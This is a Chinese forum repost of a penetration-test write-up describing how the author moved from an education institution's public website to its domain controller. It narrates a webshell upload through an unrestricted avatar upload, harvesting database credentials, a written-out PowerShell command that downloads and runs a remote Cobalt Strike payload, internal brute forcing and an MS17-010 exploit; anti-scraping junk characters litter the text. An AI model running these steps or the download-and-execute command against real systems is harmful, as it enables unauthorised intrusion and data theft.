找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2126|回复: 0
打印 上一主题 下一主题

渗透实战 | 从外网直接打到内网全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2024-3-1 19:41:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

9 g; ]. D+ d4 P7 I5 d2 ~6 c& C7 M 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路 - u4 E% Z( W9 h0 Q5 \

( q6 s7 } Y( P2 T

) R( T! D* U3 A& }0 n# i1 a; Q  # w. [5 Z* M$ p3 }

. ^. p6 j* l1 k$ G

' ?! N- l8 }; K6 g- n 正文7 X, g( J6 k# j- n

1 [2 U$ L- X' H- Y

# w# ` n2 K/ m( G5 B, e( h" f }  3 f; o+ c# P8 }2 Z7 q) q

5 R2 \& K. b( R9 R g9 e/ e6 f9 ^

+ |" U/ C: D! C4 E 目标:www.xxxx.com(一家教育机构)
^6 G3 @% j; k& A4 S4 p
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
& b9 N1 I0 V8 I( x/ G

, p, h6 U: ^# }

7 X; x1 H3 `5 O( N7 T vshapes= ' }4 e5 m) ]% G) v* l, m5 }

% a5 f" a4 U; ?! V3 `

/ ?' L: ~: n% ^0 s 进行了简单的信息搜集
! E- y8 H, n6 Q3 s4 e; U
3 Q' e, F$ `: e2 K/ L2 k5 m) r
/ Z/ o1 u8 R, w; w

# j- S8 K1 p l, G

/ F# K. J# g" y% q/ g* T q# F3 e 子域名搜集 1 H; u+ L( c p2 d

: `; ]7 r) i, l5 a, S3 M

{. G' g/ P" N. S; @! A vshapes= % ?) R3 @$ [8 G- }' ?, ]6 x/ f$ U& {

# ]" F: v% p' ^7 x5 e: e

0 G5 _4 _8 i/ t( C, l fofa找资产
d# r6 u# ~. u. ~" v( X
: B$ O- o6 I; \, y( w1 m7 B
! ] B' g, K% _: [5 K. `

; ?0 i0 U) @( K, H; T

2 s9 }8 ]0 ~& T3 h4 t0 e* } vshapes=3 x( W8 A1 F+ x

5 l, t9 f/ ^5 A$ b3 L- k. N

) ]# |! P+ A. P 一共七个资产。去重之后只有两个。
2 Y5 x. b* j3 n
1 S8 w, x1 P% r: r: i' {4 }( E, B$ \
( z+ Y: \ V! O9 m6 H) h# [0 w

, u. `# n& M( U' o

Y7 Y. o9 ^7 b8 _ 目录探测8 N: M& R8 p4 H. p( L. Z

5 b, |9 [8 B5 Z' G* \8 ]

! a0 _- O; x$ o4 u. [6 T% t vshapes= 7 u6 |5 l/ @8 g% U3 W6 p

T9 t0 e' n6 ~5 E8 q

; Q' T( {# Z- ]: t0 P/ p5 j 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
" }2 l% ~/ x" v/ W
. K! P. j0 R" J H) j* X
4 N/ j) ]: _0 w5 u- \# J' h

9 \- X) {* X$ S/ ?: ^

# T! P, y: F' B- Y! r. t! i 我又尝试了通过修改返回包来绕过登录界面% O* G6 d! L1 X1 i6 s ^/ u0 C' z& p$ t

" K9 e6 a$ t3 n6 \

! ?$ ?9 _5 H& {" X' ` vshapes=) p/ c/ o" R. V) R* i c+ b

8 c4 O5 Y1 e% A5 M7 K5 G" l

+ n8 R, R: b6 L) D4 e H 还是不行,尝试注入无果; x7 h7 P6 I4 g

, ^$ e! a0 n; g* B P( m2 a3 t

0 M% |( N0 ?2 ^ vshapes=* G6 d% \* `7 L5 V9 A

6 W* F) S" V9 }# k* b/ |

7 L2 T" W8 u4 n* q) y, u/ }5 Q 不过我目录探测出了一处Spring信息泄露
9 F% N, g$ y! R5 T# Q# X9 G
0 x& H! K g. h4 P% c5 J
3 X6 J- `2 X4 f6 ?- F1 c

3 ?5 ^; {, ] y9 t" M- @

5 C p/ D% N# B+ [' R- D; l vshapes= : Y! ?! L8 d. ?% s3 c/ M

. N8 j. L3 h4 J- `! H2 k, E

! j4 i0 O+ I" h. S 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录 3 S! C- c" r2 e m, I

( z- p+ P8 n6 Y/ m* I2 \

% C& Q; o; ~1 T+ X9 Z+ {! @. W vshapes= ; d1 e3 |1 O$ K$ h8 V. y8 s

& |# o& n( w T2 d

/ \6 x9 W3 w" Y' e7 A0 I, |; [ 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。 # u# S2 V! S4 b3 T o

( Q3 C3 w& S8 [8 G5 O* \

4 `+ ?9 E& b5 N" K vshapes= 1 z5 G2 e# F5 d$ | @

' {" {; `+ Z$ U( t9 x* U$ Y

( ^+ \5 D/ b O! h 获取有些师傅到这一步就手机抓包电脑测了。# T6 d5 X9 z4 _) `, a' u

9 }& b! X0 x; t) [

3 v {- r2 `$ |6 {8 ` Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。 ' h' z* G; Z2 J1 x! D

7 R1 I0 j5 O" w% W) e7 K& e. I/ Q

, P6 V' B" W" `1 p, I 其中在一个公众号发现了小程序,可以进行注册。. q- P" x6 o: C, I6 o% G# B

" I- j% c/ X$ @2 u$ Z

( c$ R2 Z( y4 Z 看到了头像上传,尝试上传获取WebShell4 B4 ?( w+ s3 K- l" j

8 l' F$ E, p8 t; Q s* Y

* |) D; i+ Q, x' c# `% @7 S! k vshapes= ' T9 b2 z6 |" O# ~

' |' ] f/ `% G) o0 p8 N

4 V) g! {2 c. f8 p8 |. n' Q 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问 4 o8 j {8 m# P; o/ S; Q

8 x1 \* x+ V: a( \/ C) }

6 f1 o3 p/ R f. Z+ U: _/ W+ y vshapes= 5 E' R3 Z3 x' a/ k* o+ K

0 j- E/ U$ j/ x' A

( U. ~) x4 V0 A 然后上了大马( F s7 { W8 {

% i* s+ ]1 T: p& o4 d- r

- m; f* p8 C; g1 |) n5 q& B3 h v vshapes=9 x( k- p4 s( G5 N( b' J5 |

' n/ e% J" T6 Y: o& f# f1 G- a) @

: A; \5 s4 X8 g% G vshapes= K, r6 k* M8 c* m& N

; C! Z' g& o8 Q* i( U

4 A* R9 g: g1 i1 E/ j 通过翻找文件发现数据库账号密码# `. S0 e. |4 P3 f0 \1 x! m

( \2 s9 D; H6 q

3 l: S6 P7 @- M0 [; L vshapes= + R9 c. Z/ `0 m) [& o; f/ f

! g9 k/ o6 e1 ~7 V& o+ x& y$ r

+ P/ H0 [! ]* I --内网渗透7 _ _* r$ X) }3 p% J) g; e7 P

' _: o# @) q) l' x% e' n

+ A1 L% V1 T) h) R$ [5 U7 H' H6 h* ^ 直接通过powershell执行 cs上线7 \5 T# f/ f+ n2 d* o" r

/ }1 ~7 @( k* _5 Q _

$ W4 G6 f x6 N% I' n powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))" 2 u" j0 O r7 z0 ~: h6 I: g/ ^( l

& c: S3 ]6 I, o+ I/ \, C

# t$ \& A L( G% Z vshapes= # P* _: T" c& x1 x

7 A" Q7 M- L; M( c: M3 c( \

+ R2 R" ^2 Q5 c* W$ j9 w 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 8 Q' r' z- D4 ?- b7 I# I% Q6 R4 Z* B

1 n' ?$ S" i, \

- u+ b0 J# I7 {# [ vshapes=, F) ?+ v |& x/ ^5 Z% L6 }

5 N3 K5 R. B. d0 _# B9 P1 V& |

" [+ o# N; J% i! v n 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
% e' r; K& Z r& q$ q; V
1 M: x8 O$ f4 M! j- i
$ Z c! A# X: _/ I: b4 F
, |; f3 O# E; w* H. I

2 W8 R- Q! T' \' X3 Y; D$ j

2 {7 E8 c4 P e4 W6 W6 | vshapes= 3 p9 j, t: B9 j1 D* ~6 Z- b2 L

7 A J0 ^5 a' h' @* @9 h! v

. E* t8 ~ ~& c" p8 C; V 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
/ q7 n! h3 O3 r& \" _* p
5 ^2 s- v( g4 c3 ~4 c q
/ g- t5 }& V& A

# g, n: `. E0 v% G9 G& j1 Q* `

6 s0 ]( Z5 z; A. p! c6 `2 ?9 g vshapes= - E& }) }/ t3 h; t( r! t

6 F1 M$ |: h+ W& h, a0 j2 |

& { R8 L$ F P* a6 o4 J
! l* S2 V1 c0 }
& L; A u* x- P9 X n
4 j- z8 M' L F9 A+ K' w7 k: @

# T9 i" ~5 c0 ~% f" Q

( z" u( n8 y' ?: n   2 q% ^/ |, m5 Y- z, E/ X- L

+ v) c' }; T* N3 n2 h# l

3 ]; x7 Z. I$ b5 f3 |: M 小结 9 X; h6 W4 A! c

* `& z, g0 L4 j5 i

6 f# {& H) |8 W2 d2 S- n( o  ; d! q7 G" {, Z: }

@+ y$ c& N+ Y$ l( {. r7 a

8 o0 J! s \1 u1 d# O4 y( { 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路! % }: h+ W8 x3 r3 F% v, i

0 t3 g; \" _3 V

) p( u/ W# z1 X$ m8 T" v8 r6 R  : [0 m; {' U% }, [/ {$ q

! _1 @6 P% H. P' ~/ I8 d9 _, I$ C1 B
    + I) j1 y! ?! m& a7 Y* T: s% {9 u
  • " ]4 s1 m5 E6 R6 C6 h4 w   / o) |9 n* O- b
  • 5 Z; G9 u9 ^$ T
  • ; ~! ^* e# d9 u L0 Z, ?# A7 ^* A# N  ; P0 b0 V+ [' o/ w$ G
  • 8 z. X6 R4 J' y* D/ d2 y7 B
& j! G* H1 l! J4 i

. W' P+ _! Z9 K9 u 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html }. g3 D% O# l7 |( k% D+ m

4 s' x' Z0 Z3 |7 }/ w5 q9 h

" `% b) ?3 c4 Z  2 j0 T# N8 u( F, r

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表